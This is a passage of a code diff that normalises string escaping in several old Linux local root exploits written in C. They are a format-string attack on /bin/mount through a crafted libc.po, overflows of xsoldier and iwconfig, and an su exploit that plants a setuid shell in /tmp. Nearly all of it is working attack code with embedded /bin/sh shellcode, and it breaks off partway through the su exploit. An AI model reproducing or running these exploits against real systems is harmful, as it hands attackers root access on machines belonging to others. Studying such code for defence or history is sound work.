"\x29\xc0" /* subl %eax, %eax */
|
||||
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
|
||||
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
|
||||
"\x89\x76\x08" /* movl %esi, 0x08(%esi) */
|
||||
"\xb0\x0b" /* movb $0x0b, %al */
|
||||
"\x87\xf3" /* xchgl %esi, %ebx */
|
||||
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
|
||||
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
|
||||
"\xcd\x80" /* int $0x80 */
|
||||
|
||||
/* callz: */
|
||||
\\\"\\\\xe8\\\\xe3\\\\xff\\\\xff\\\\xff\\\" /* call start */
|
||||
"\xe8\xe3\xff\xff\xff" /* call start */
|
||||
|
||||
/* /bin/sh */
|
||||
\\\"\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x73\\\\x68\\\";
|
||||
"\x2f\x62\x69\x6e\x2f\x73\x68";
|
||||
|
||||
int main(int argc, char** argv) {
|
||||
FILE* fp;
|
||||
|
@ -50,7 +50,7 @@ int main(int argc, char** argv) {
|
|||
char buffer[20000], fmtbuf[1000], numbuf[2000];
|
||||
int shloc=0xbfffdaa0;
|
||||
int i=0, c=0;
|
||||
char mode=\\\'n\\\';
|
||||
char mode='n';
|
||||
int debug=0;
|
||||
int eiploc=0xbffffdc0;
|
||||
char* envbuf[2];
|
||||
|
@ -65,20 +65,20 @@ int main(int argc, char** argv) {
|
|||
memset(buffer, 0, sizeof(buffer));
|
||||
memset(fmtbuf, 0, sizeof(fmtbuf));
|
||||
memset(numbuf, 0, sizeof(numbuf));
|
||||
printf(\\\"heapaddr: 0x%x\\\\n\\\", heapaddr);
|
||||
printf("heapaddr: 0x%x\n", heapaddr);
|
||||
c=0;
|
||||
strcpy (xpath, \\\"/bin/mount\\\");
|
||||
strcpy (xpath, "/bin/mount");
|
||||
|
||||
while ((s=getopt(argc, argv, \\\"p:s:b:e:a:n:i:d\\\")) != EOF) {
|
||||
while ((s=getopt(argc, argv, "p:s:b:e:a:n:i:d")) != EOF) {
|
||||
switch(s) {
|
||||
case \\\'s\\\': shloc=strtoul(optarg, 0, 0); break;
|
||||
case \\\'b\\\': bpad=atoi(optarg); break;
|
||||
case \\\'e\\\': epad=atoi(optarg); break;
|
||||
case \\\'a\\\': eiploc=strtoul(optarg, 0, 0); break;
|
||||
case \\\'n\\\': nump=atoi(optarg); break;
|
||||
case \\\'i\\\': inc=atoi(optarg); break;
|
||||
case \\\'p\\\': strcpy(xpath, optarg); break;
|
||||
case \\\'d\\\': debug=1; break;
|
||||
case 's': shloc=strtoul(optarg, 0, 0); break;
|
||||
case 'b': bpad=atoi(optarg); break;
|
||||
case 'e': epad=atoi(optarg); break;
|
||||
case 'a': eiploc=strtoul(optarg, 0, 0); break;
|
||||
case 'n': nump=atoi(optarg); break;
|
||||
case 'i': inc=atoi(optarg); break;
|
||||
case 'p': strcpy(xpath, optarg); break;
|
||||
case 'd': debug=1; break;
|
||||
default:
|
||||
}
|
||||
}
|
||||
|
@ -87,16 +87,16 @@ int main(int argc, char** argv) {
|
|||
if (epad < 0) epad+=16;
|
||||
|
||||
for (i=0; i < nump; i++) {
|
||||
buffer[c++]=\\\'%\\\';
|
||||
buffer[c++]=\\\'8\\\';
|
||||
buffer[c++]=\\\'x\\\';
|
||||
buffer[c++]='%';
|
||||
buffer[c++]='8';
|
||||
buffer[c++]='x';
|
||||
}
|
||||
|
||||
if (debug) { mode=\\\'p\\\';
|
||||
strcpy(sc, \\\"AAAA\\\");
|
||||
if (debug) { mode='p';
|
||||
strcpy(sc, "AAAA");
|
||||
numnops=0;
|
||||
}
|
||||
printf(\\\"cur strlen: %i\\\\n\\\", strlen(buffer));
|
||||
printf("cur strlen: %i\n", strlen(buffer));
|
||||
|
||||
/* size of executed program (/bin/mount) does not seem to affect these calculations
|
||||
it does affect location of eip however, (which is why its nice to just overwrite exit
|
||||
|
@ -111,58 +111,58 @@ int main(int argc, char** argv) {
|
|||
num[3]=((shloc >> 24) & 0xff)+1;
|
||||
if (num[3] < 0) num[3]+=256;
|
||||
|
||||
sprintf(fmtbuf, \\\"%%%id%%h%c%%%id%%h%c%%%id%%h%c%%%id%%h%c\\\", num[0]
|
||||
sprintf(fmtbuf, "%%%id%%h%c%%%id%%h%c%%%id%%h%c%%%id%%h%c", num[0]
|
||||
, mode, num[1], mode, num[2], mode, num[3], mode);
|
||||
printf(\\\"fmtbuf: %s\\\\n\\\", fmtbuf);
|
||||
printf(\\\"strlen(fmtbuf): %i\\\\n\\\", strlen(fmtbuf));
|
||||
printf("fmtbuf: %s\n", fmtbuf);
|
||||
printf("strlen(fmtbuf): %i\n", strlen(fmtbuf));
|
||||
memcpy(buffer+strlen(buffer), fmtbuf, strlen(fmtbuf));
|
||||
|
||||
memset(buffer+strlen(buffer), 0x90, numnops);
|
||||
memcpy(buffer+strlen(buffer), sc, strlen(sc));
|
||||
|
||||
mkdir(\\\"/tmp/sk8\\\", 0755);
|
||||
mkdir(\\\"/tmp/sk8/LC_MESSAGES\\\", 0755);
|
||||
if ( ! (fp=fopen(\\\"/tmp/sk8/LC_MESSAGES/libc.po\\\", \\\"w\\\") ) ) {
|
||||
printf(\\\"could not create bad libc.po\\\\n\\\");
|
||||
mkdir("/tmp/sk8", 0755);
|
||||
mkdir("/tmp/sk8/LC_MESSAGES", 0755);
|
||||
if ( ! (fp=fopen("/tmp/sk8/LC_MESSAGES/libc.po", "w") ) ) {
|
||||
printf("could not create bad libc.po\n");
|
||||
exit(-1);
|
||||
}
|
||||
fprintf(fp, \\\"msgid \\\\\\\"%%s: unrecognized option `--%%s\\\'\\\\\\\\n\\\\\\\"\\\\n\\\");
|
||||
fprintf(fp, \\\"msgstr \\\\\\\"%s\\\\\\\\n\\\\\\\"\\\", buffer);
|
||||
fprintf(fp, "msgid \"%%s: unrecognized option `--%%s'\\n\"\n");
|
||||
fprintf(fp, "msgstr \"%s\\n\"", buffer);
|
||||
fclose(fp);
|
||||
|
||||
system(\\\"msgfmt /tmp/sk8/LC_MESSAGES/libc.po -o /tmp/sk8/LC_MESSAGES/libc.mo\\\");
|
||||
system("msgfmt /tmp/sk8/LC_MESSAGES/libc.po -o /tmp/sk8/LC_MESSAGES/libc.mo");
|
||||
|
||||
c=0;
|
||||
numbuf[c++]=\\\'-\\\';
|
||||
numbuf[c++]=\\\'-\\\';
|
||||
numbuf[c++]='-';
|
||||
numbuf[c++]='-';
|
||||
|
||||
memset(numbuf+strlen(numbuf), \\\'B\\\', bpad);
|
||||
memset(numbuf+strlen(numbuf), 'B', bpad);
|
||||
|
||||
memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4);
|
||||
memcpy(numbuf+strlen(numbuf), "PPPP", 4);
|
||||
*(long*)(numbuf+strlen(numbuf))=eiploc;
|
||||
|
||||
memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4);
|
||||
memcpy(numbuf+strlen(numbuf), "PPPP", 4);
|
||||
*(long*)(numbuf+strlen(numbuf))=eiploc+1;
|
||||
|
||||
memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4);
|
||||
memcpy(numbuf+strlen(numbuf), "PPPP", 4);
|
||||
*(long*)(numbuf+strlen(numbuf))=eiploc+2;
|
||||
|
||||
memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4);
|
||||
memcpy(numbuf+strlen(numbuf), "PPPP", 4);
|
||||
*(long*)(numbuf+strlen(numbuf))=eiploc+3;
|
||||
printf(\\\"cur numbuf length: %i\\\\n\\\", strlen(numbuf));
|
||||
memset(numbuf+strlen(numbuf), \\\'Z\\\', epad);
|
||||
printf(\\\"cur numbuf length: %i\\\\n\\\", strlen(numbuf));
|
||||
printf("cur numbuf length: %i\n", strlen(numbuf));
|
||||
memset(numbuf+strlen(numbuf), 'Z', epad);
|
||||
printf("cur numbuf length: %i\n", strlen(numbuf));
|
||||
|
||||
envbuf[0]=\\\"LANGUAGE=en_GB/../../../../tmp/sk8/\\\";
|
||||
envbuf[0]="LANGUAGE=en_GB/../../../../tmp/sk8/";
|
||||
envbuf[1]=0;
|
||||
|
||||
printf(\\\"strlen(numbuf): %i\\\\n\\\", strlen(numbuf));
|
||||
printf(\\\"bpad: %i; epad: %i\\\\n\\\", bpad, epad);
|
||||
printf(\\\"number of %%p\\\'s to traverse stack: %i\\\\n\\\", nump);
|
||||
printf(\\\"address of eip: 0x%x\\\\n\\\", eiploc);
|
||||
printf(\\\"inc: %i\\\\n\\\", inc);
|
||||
printf("strlen(numbuf): %i\n", strlen(numbuf));
|
||||
printf("bpad: %i; epad: %i\n", bpad, epad);
|
||||
printf("number of %%p's to traverse stack: %i\n", nump);
|
||||
printf("address of eip: 0x%x\n", eiploc);
|
||||
printf("inc: %i\n", inc);
|
||||
|
||||
execle(xpath, \\\"mount\\\", numbuf, 0, envbuf);
|
||||
execle(xpath, "mount", numbuf, 0, envbuf);
|
||||
}
|
||||
|
||||
|
||||
|
|
|
@ -7,15 +7,15 @@
|
|||
#define RANGE 20
|
||||
|
||||
unsigned char blah[] =
|
||||
\"\\xeb\\x03\\x5e\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x83\\xc6\\x0d\\x31\\xc9\\xb1\\x6c\\x80\\x36\\x01\\x46\\xe2\\xfa\"
|
||||
\"\\xea\\x09\\x2e\\x63\\x68\\x6f\\x2e\\x72\\x69\\x01\\x80\\xed\\x66\\x2a\\x01\\x01\"
|
||||
\"\\x54\\x88\\xe4\\x82\\xed\\x1d\\x56\\x57\\x52\\xe9\\x01\\x01\\x01\\x01\\x5a\\x80\\xc2\\xc7\\x11\"
|
||||
\"\\x01\\x01\\x8c\\xba\\x1f\\xee\\xfe\\xfe\\xc6\\x44\\xfd\\x01\\x01\\x01\\x01\\x88\\x7c\\xf9\\xb9\"
|
||||
\"\\x47\\x01\\x01\\x01\\x30\\xf7\\x30\\xc8\\x52\\x88\\xf2\\xcc\\x81\\x8c\\x4c\\xf9\\xb9\\x0a\\x01\"
|
||||
\"\\x01\\x01\\x88\\xff\\x30\\xd3\\x52\\x88\\xf2\\xcc\\x81\\x30\\xc1\\x5a\\x5f\\x5e\\x88\\xed\\x5c\"
|
||||
\"\\xc2\\x91\";
|
||||
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
|
||||
"\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
|
||||
"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"
|
||||
"\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"
|
||||
"\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
|
||||
"\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"
|
||||
"\xc2\x91";
|
||||
|
||||
long get_sp () { __asm__ (\"mov %esp, %eax\"); }
|
||||
long get_sp () { __asm__ ("mov %esp, %eax"); }
|
||||
|
||||
int
|
||||
main (int argc, char *argv[])
|
||||
|
@ -38,10 +38,10 @@ main (int argc, char *argv[])
|
|||
for (i = i + strlen (blah); i < BUFSIZE; i += 4)
|
||||
*(long *) &buffer[i] = ret+offset;
|
||||
|
||||
fprintf(stderr, \"xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)\\n\");
|
||||
fprintf(stderr, \"zorgon@antionline.org\\n\");
|
||||
fprintf(stderr, \"[return address = %x] [offset = %d] [buffer size = %d]\\n\", ret + offset, offset, BUFSIZE);
|
||||
execl (\"./xsoldier\", \"xsoldier\", \"-display\", buffer, 0);
|
||||
fprintf(stderr, "xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)\n");
|
||||
fprintf(stderr, "zorgon@antionline.org\n");
|
||||
fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", ret + offset, offset, BUFSIZE);
|
||||
execl ("./xsoldier", "xsoldier", "-display", buffer, 0);
|
||||
}
|
||||
|
||||
|
||||
|
|
|
@ -19,17 +19,17 @@ Exploit:
|
|||
/* x86/linux shellcode */
|
||||
|
||||
char shellcode[]= /* 24 bytes */
|
||||
\"\\x31\\xc0\" /* xorl %eax,%eax */
|
||||
\"\\x50\" /* pushl %eax */
|
||||
\"\\x68\\x2f\\x2f\\x73\\x68\" /* pushl $0x68732f2f */
|
||||
\"\\x68\\x2f\\x62\\x69\\x6e\" /* pushl $0x6e69622f */
|
||||
\"\\x89\\xe3\" /* movl %esp,%ebx */
|
||||
\"\\x50\" /* pushl %eax */
|
||||
\"\\x53\" /* pushl %ebx */
|
||||
\"\\x89\\xe1\" /* movl %esp,%ecx */
|
||||
\"\\x99\" /* cltd */
|
||||
\"\\xb0\\x0b\" /* movb $0x0b,%al */
|
||||
\"\\xcd\\x80\"; /* int $0x80 */
|
||||
"\x31\xc0" /* xorl %eax,%eax */
|
||||
"\x50" /* pushl %eax */
|
||||
"\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
|
||||
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
|
||||
"\x89\xe3" /* movl %esp,%ebx */
|
||||
"\x50" /* pushl %eax */
|
||||
"\x53" /* pushl %ebx */
|
||||
"\x89\xe1" /* movl %esp,%ecx */
|
||||
"\x99" /* cltd */
|
||||
"\xb0\x0b" /* movb $0x0b,%al */
|
||||
"\xcd\x80"; /* int $0x80 */
|
||||
|
||||
|
||||
int main(int argc,char **argv){
|
||||
|
@ -37,11 +37,11 @@ int main(int argc,char **argv){
|
|||
unsigned long ret;
|
||||
int i;
|
||||
|
||||
char *prog[]={\"/sbin/iwconfig\",buf,NULL};
|
||||
char *env[]={\"HOME=/\",shellcode,NULL};
|
||||
char *prog[]={"/sbin/iwconfig",buf,NULL};
|
||||
char *env[]={"HOME=/",shellcode,NULL};
|
||||
|
||||
ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06;
|
||||
printf(\"use ret addr: 0x%x\\n\",ret);
|
||||
printf("use ret addr: 0x%x\n",ret);
|
||||
|
||||
memset(buf,0x41,sizeof(buf));
|
||||
memcpy(&buf[92],&ret,4);
|
||||
|
|
|
@ -15,18 +15,18 @@ A problem has been identified in the iwconfig program when handling strings on t
|
|||
|
||||
#include <stdio.h>
|
||||
|
||||
#define BIN \"/sbin/iwconfig\"
|
||||
#define BIN "/sbin/iwconfig"
|
||||
|
||||
unsigned char shellcode[] =
|
||||
\"\\x31\\xc0\\x31\\xdb\\xb0\\x17\\xcd\\x80\\x31\\xc0\\xb0\\x2e\"
|
||||
\"\\xcd\\x80\\x31\\xc0\\x53\\x68\\x77\\x30\\x30\\x74\\x89\\xe3\"
|
||||
\"\\xb0\\x27\\xcd\\x80\\x31\\xc0\\xb0\\x3d\\xcd\\x80\\x31\\xc0\"
|
||||
\"\\x31\\xdb\\x31\\xc9\\xb1\\x0a\\x50\\x68\\x2e\\x2e\\x2f\\x2f\"
|
||||
\"\\xe2\\xf9\\x89\\xe3\\xb0\\x0c\\xcd\\x80\\x31\\xc0\\x31\\xdb\"
|
||||
\"\\x6a\\x2e\\x89\\xe3\\xb0\\x3d\\xcd\\x80\\x31\\xc0\\x31\\xdb\"
|
||||
\"\\x31\\xc9\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\"
|
||||
\"\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x31\\xd2\\xb0\\x0b\\xcd\"
|
||||
\"\\x80\\x31\\xc0\\x31\\xdb\\xb0\\x01\\xcd\\x80\";
|
||||
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x2e"
|
||||
"\xcd\x80\x31\xc0\x53\x68\x77\x30\x30\x74\x89\xe3"
|
||||
"\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31\xc0"
|
||||
"\x31\xdb\x31\xc9\xb1\x0a\x50\x68\x2e\x2e\x2f\x2f"
|
||||
"\xe2\xf9\x89\xe3\xb0\x0c\xcd\x80\x31\xc0\x31\xdb"
|
||||
"\x6a\x2e\x89\xe3\xb0\x3d\xcd\x80\x31\xc0\x31\xdb"
|
||||
"\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
|
||||
"\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
|
||||
"\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80";
|
||||
|
||||
int
|
||||
main ()
|
||||
|
@ -40,7 +40,7 @@ main ()
|
|||
*(add_ptr++)=ret_add;
|
||||
memset ((char *)out, 0x90, 1337);
|
||||
memcpy ((char *)out + 333, shellcode, strlen(shellcode));
|
||||
memcpy((char *)out, \"OUT=\", 4);
|
||||
memcpy((char *)out, "OUT=", 4);
|
||||
putenv(out);
|
||||
execl (BIN, BIN, buf, NULL);
|
||||
return 0;
|
||||
|
|
|
@ -21,7 +21,7 @@ A problem has been identified in the iwconfig program when handling strings on t
|
|||
*/
|
||||
|
||||
/*
|
||||
* Yet another Proof Of Concept Xploit for \'iwconfig\'
|
||||
* Yet another Proof Of Concept Xploit for 'iwconfig'
|
||||
*/
|
||||
|
||||
|
||||
|
@ -32,8 +32,8 @@ A problem has been identified in the iwconfig program when handling strings on t
|
|||
#define RET 0xbffffc3f
|
||||
|
||||
char shellcode[]=
|
||||
\"\\xeb\\x17\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\"
|
||||
\"\\x4e\\x08\\x31\\xd2\\xcd\\x80\\xe8\\xe4\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x58\";
|
||||
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
|
||||
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
|
||||
|
||||
int main(int argc,char **argv)
|
||||
{
|
||||
|
@ -49,7 +49,7 @@ int main(int argc,char **argv)
|
|||
|
||||
memcpy(buff+i,shellcode,strlen(shellcode));
|
||||
|
||||
execl(\"/sbin/iwconfig\",\"iwconfig\",buff,(char *)NULL);
|
||||
execl("/sbin/iwconfig","iwconfig",buff,(char *)NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
|
|
@ -9,23 +9,23 @@
|
|||
#include <dirent.h>
|
||||
|
||||
char *shellcode =
|
||||
\"\\x31\\xc0\\x83\\xc0\\x17\\x31\\xdb\\xcd\\x80\\xeb\"
|
||||
\"\\x30\\x5f\\x31\\xc9\\x88\\x4f\\x17\\x88\\x4f\\x1a\"
|
||||
\"\\x8d\\x5f\\x10\\x89\\x1f\\x8d\\x47\\x18\\x89\\x47\"
|
||||
\"\\x04\\x8d\\x47\\x1b\\x89\\x47\\x08\\x31\\xc0\\x89\"
|
||||
\"\\x47\\x0c\\x8d\\x0f\\x8d\\x57\\x0c\\x83\\xc0\\x0b\"
|
||||
\"\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\xe8\"
|
||||
\"\\xcb\\xff\\xff\\xff\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
|
||||
\"\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x30\\x2d\\x63\"
|
||||
\"\\x30\"
|
||||
\"chown root /tmp/xp;chmod 4777 /tmp/xp\";
|
||||
"\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb"
|
||||
"\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a"
|
||||
"\x8d\x5f\x10\x89\x1f\x8d\x47\x18\x89\x47"
|
||||
"\x04\x8d\x47\x1b\x89\x47\x08\x31\xc0\x89"
|
||||
"\x47\x0c\x8d\x0f\x8d\x57\x0c\x83\xc0\x0b"
|
||||
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
|
||||
"\xcb\xff\xff\xff\x41\x41\x41\x41\x41\x41"
|
||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||
"\x2f\x62\x69\x6e\x2f\x73\x68\x30\x2d\x63"
|
||||
"\x30"
|
||||
"chown root /tmp/xp;chmod 4777 /tmp/xp";
|
||||
|
||||
char *LC_MESSAGES = \"/tmp/LC_MESSAGES\";
|
||||
char *LC_MESSAGES = "/tmp/LC_MESSAGES";
|
||||
int NOP_LEN = 12000;
|
||||
|
||||
char *msgfmt = \"/usr/bin/msgfmt\";
|
||||
char *objdump = \"/usr/bin/objdump\";
|
||||
char *msgfmt = "/usr/bin/msgfmt";
|
||||
char *objdump = "/usr/bin/objdump";
|
||||
char *language = NULL;
|
||||
|
||||
char *make_format_string(unsigned long, int, int);
|
||||
|
@ -52,149 +52,149 @@ int main(int argc, char **argv)
|
|||
char randfile[1024];
|
||||
char *args2[2], opt;
|
||||
|
||||
printf(\"su exploit by XP <xp@xtreme-power.com>\\n\");
|
||||
printf(\"Enjoy!\\n\\n\");
|
||||
printf("su exploit by XP <xp@xtreme-power.com>\n");
|
||||
printf("Enjoy!\n\n");
|
||||
|
||||
while ((opt = getopt(argc, argv, \"o:n:m:O:e:l:\")) != EOF)
|
||||
while ((opt = getopt(argc, argv, "o:n:m:O:e:l:")) != EOF)
|
||||
switch(opt) {
|
||||
case \'o\':
|
||||
case 'o':
|
||||
offset = atoi(optarg);
|
||||
break;
|
||||
case \'n\':
|
||||
case 'n':
|
||||
NOP_LEN = atoi(optarg);
|
||||
break;
|
||||
case \'m\':
|
||||
case 'm':
|
||||
msgfmt = strdup(optarg);
|
||||
break;
|
||||
case \'O\':
|
||||
case 'O':
|
||||
objdump = strdup(optarg);
|
||||
break;
|
||||
case \'e\':
|
||||
sscanf(optarg, \"%i:%i\", &eat, &pad);
|
||||
case 'e':
|
||||
sscanf(optarg, "%i:%i", &eat, &pad);
|
||||
break;
|
||||
case \'l\':
|
||||
case 'l':
|
||||
language = (char*) malloc(40 + strlen(optarg));
|
||||
if (!language) {
|
||||
printf(\"malloc failed\\naborting\\n\");
|
||||
printf("malloc failed\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(language, 0, 40 + strlen(optarg));
|
||||
sprintf(language, \"LANGUAGE=%s/../../../../../../tmp\", optarg);
|
||||
sprintf(language, "LANGUAGE=%s/../../../../../../tmp", optarg);
|
||||
break;
|
||||
default:
|
||||
exit(0);
|
||||
}
|
||||
|
||||
printf(\"Phase 1. Checking paths and write permisions\\n\");
|
||||
printf(\" Checking for %s...\", msgfmt);
|
||||
printf("Phase 1. Checking paths and write permisions\n");
|
||||
printf(" Checking for %s...", msgfmt);
|
||||
checkfor(msgfmt);
|
||||
printf(\" Checking for %s...\", objdump);
|
||||
printf(" Checking for %s...", objdump);
|
||||
checkfor(objdump);
|
||||
|
||||
printf(\" Checking write permisions on /tmp...\");
|
||||
if (stat(\"/tmp\", &st) < 0) {
|
||||
printf(\"failed. cannot stat /tmp\\naborting\\n\");
|
||||
printf(" Checking write permisions on /tmp...");
|
||||
if (stat("/tmp", &st) < 0) {
|
||||
printf("failed. cannot stat /tmp\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
if (!(st.st_mode & S_IWOTH)) {
|
||||
printf(\"failed. /tmp it\'s not +w\\naborting\\n\");
|
||||
printf("failed. /tmp it's not +w\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
printf(\"Ok\\n\");
|
||||
printf("Ok\n");
|
||||
fflush(stdout);
|
||||
|
||||
printf(\" Checking read permisions on /bin/su...\");
|
||||
if (stat(\"/bin/su\", &st) < 0) {
|
||||
printf(\"failed. cannot stat /bin/su\\naborting\\n\");
|
||||
printf(" Checking read permisions on /bin/su...");
|
||||
if (stat("/bin/su", &st) < 0) {
|
||||
printf("failed. cannot stat /bin/su\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
if (!(st.st_mode & S_IROTH)) {
|
||||
printf(\"failed. /bin/su it\'s not +r\\naborting\\n\");
|
||||
printf("failed. /bin/su it's not +r\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
printf(\"Ok\\n\");
|
||||
printf("Ok\n");
|
||||
fflush(stdout);
|
||||
|
||||
if (!language) {
|
||||
printf(\" Checking for a valid language...\");
|
||||
printf(" Checking for a valid language...");
|
||||
search_valid_language();
|
||||
printf(\"Ok\\n\");
|
||||
printf("Ok\n");
|
||||
}
|
||||
|
||||
printf(\" Checking that %s does not exist...\", LC_MESSAGES);
|
||||
printf(" Checking that %s does not exist...", LC_MESSAGES);
|
||||
if (stat(LC_MESSAGES, &st) >= 0) {
|
||||
printf(\"failed. %s exists\\naborting\\n\", LC_MESSAGES);
|
||||
printf("failed. %s exists\naborting\n", LC_MESSAGES);
|
||||
exit(0);
|
||||
}
|
||||
printf(\"Ok\\n\");
|
||||
printf("Ok\n");
|
||||
fflush(stdout);
|
||||
|
||||
printf(\"Phase 2. Calculating eat and pad values\\n \");
|
||||
printf("Phase 2. Calculating eat and pad values\n ");
|
||||
srand(time(NULL));
|
||||
|
||||
if (eat || pad) printf(\"skkiping, values set by user to eat = %i and
|
||||
pad = %i\\n\", eat, pad);
|
||||
if (eat || pad) printf("skkiping, values set by user to eat = %i and
|
||||
pad = %i\n", eat, pad);
|
||||
else {
|
||||
calculate_eat_space(&eat, &pad);
|
||||
printf(\"done\\n eat = %i and pad = %i\\n\", eat, pad);
|
||||
printf("done\n eat = %i and pad = %i\n", eat, pad);
|
||||
}
|
||||
fflush(stdout);
|
||||
|
||||
sh_addr -= offset;
|
||||
|
||||
printf(\"Phase 3. Creating evil libc.mo and setting enviroment
|
||||
vars\\n\");
|
||||
printf("Phase 3. Creating evil libc.mo and setting enviroment
|
||||
vars\n");
|
||||
fflush(stdout);
|
||||
|
||||
mkdir(LC_MESSAGES, 0755);
|
||||
chdir(LC_MESSAGES);
|
||||
|
||||
f = fopen(\"libc.po\", \"w+\");
|
||||
f = fopen("libc.po", "w+");
|
||||
if (!f) {
|
||||
perror(\"fopen()\");
|
||||
perror("fopen()");
|
||||
exit(0);
|
||||
}
|
||||
fprintf(f,\"msgid \\\"%%s: invalid option -- %%c\\\\n\\\"\\n\");
|
||||
fprintf(f,\"msgstr \\\"%s\\\\n\\\"\", make_format_string(sh_addr, eat, 0));
|
||||
fprintf(f,"msgid \"%%s: invalid option -- %%c\\n\"\n");
|
||||
fprintf(f,"msgstr \"%s\\n\"", make_format_string(sh_addr, eat, 0));
|
||||
fclose(f);
|
||||
|
||||
sprintf(execbuf, \"%s libc.po -o libc.mo; chmod 777 libc.mo\", msgfmt);
|
||||
sprintf(execbuf, "%s libc.po -o libc.mo; chmod 777 libc.mo", msgfmt);
|
||||
system(execbuf);
|
||||
|
||||
nop_env = (char*) malloc(NOP_LEN + strlen(shellcode) + 1);
|
||||
if (!nop_env) {
|
||||
printf(\"malloc failed\\naborting\\n\");
|
||||
printf("malloc failed\naborting\n");
|
||||
exit(0);
|
||||
}
|
||||
memset(nop_env, 0x90, NOP_LEN + strlen(shellcode) + 1);
|
||||
sprintf(&nop_env[NOP_LEN], \"%s\", shellcode);
|
||||
sprintf(&nop_env[NOP_LEN], "%s", shellcode);
|
||||
|
||||
env[0] = language;
|
||||
env[1] = NULL;
|
||||
|
||||
printf(\"Phase 4. Getting address of .dtors section of /bin/su\\n \");
|
||||
printf("Phase 4. Getting address of .dtors section of /bin/su\n ");
|
||||
dtors_addr = get_dtors_addr();
|
||||
printf(\"done\\n .dtors is at 0x%08x\\n\", dtors_addr);
|
||||
printf("done\n .dtors is at 0x%08x\n", dtors_addr);
|
||||
fflush(stdout);
|
||||
|
||||
printf(\"Phase 5. Compiling suid shell\\n\");
|
||||
printf("Phase 5. Compiling suid shell\n");
|
||||
fflush(stdout);
|
||||
|
||||
make_suid_shell();
|
||||
|
||||
printf(\"Phase 6. Executing /bin/su\\n\");
|
||||
printf("Phase 6. Executing /bin/su\n");
|
||||
fflush(stdout);
|
||||
|
||||
args[0] = \"/bin/su\";
|
||||
args[1] = \"-\";
|
||||
args[0] = "/bin/su";
|
||||
args[1] = "-";
|
||||
args[2] = make_ret_str(dtors_addr, pad);
|
||||
args[3] = \"-w\";
|
||||
args[3] = "-w";
|
||||
args[4] = nop_env;
|
||||
args[5] = NULL;
|
||||
|
||||
sprintf(randfile, \"/tmp/tmprand%i\", rand());
|
||||
sprintf(randfile, "/tmp/tmprand%i", rand());
|
||||
|
||||
if (!(pid = fork())) {
|
||||
close(1);
|
||||
|
@ -203,11 +203,11 @@ vars\\n\");
|
|||
dup2(fd, 1);
|
||||
dup2(fd, 2);
|
||||
execve(args[0], args, env);
|
||||
printf(\"failed to exec /bin/su\\n\"); exit(0);
|
||||
printf("failed to exec /bin/su\n"); exit(0);
|
||||
}
|
||||
|
||||
if (pid < 0) {
|
||||
perror(\"fork()\");
|
||||
perror("fork()");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
@ -215,32 +215,32 @@ vars\\n\");
|
|||
|
||||
unlink(randfile);
|
||||
|
||||
stat(\"/tmp/xp\", &st);
|
||||
stat("/tmp/xp", &st);
|
||||
if (!(S_ISUID & st.st_mode)) {
|
||||
